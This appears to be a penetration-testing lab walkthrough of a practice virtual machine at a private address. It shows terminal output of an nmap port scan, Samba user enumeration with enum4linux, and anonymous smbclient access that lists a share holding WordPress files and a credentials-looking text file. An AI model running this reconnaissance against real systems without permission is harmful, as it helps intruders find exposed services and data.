root@kali:~# nmap -Pn 192.168.174.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-12 10:44 EST
Nmap scan report for 192.168.174.144
Host is up (0.0011s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:A2:81:40 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
A Samba service is present.
root@kali:~# enum4linux -U 192.168.174.144 // get the user list
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 12 10:45:45 2020
==========================
| Target Information |
==========================
Target ........... 192.168.174.144
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.174.144 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP
========================================
| Session Check on 192.168.174.144 |
========================================
[+] Server 192.168.174.144 allows sessions using username '', password ''
==============================================
| Getting domain SID for 192.168.174.144 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
================================
| Users on 192.168.174.144 |
================================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
enum4linux complete on Sat Dec 12 10:45:45 2020
root@kali:~# smbclient -L 192.168.174.144 // list all resources shared by the server
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
SMB1 disabled -- no workgroup available
root@kali:~# smbclient //192.168.174.144/print$
Enter WORKGROUP\root's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~# smbclient //192.168.174.144/IPC$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> pwd
Current directory is \\192.168.174.144\IPC$\
root@kali:~# smbclient //192.168.174.144/share$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Tue Aug 15 07:21:08 2017
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
3029776 blocks of size 1024. 1456448 blocks available
smb: \>
I can't even be bothered to complain about how cnblogs handles whitespace.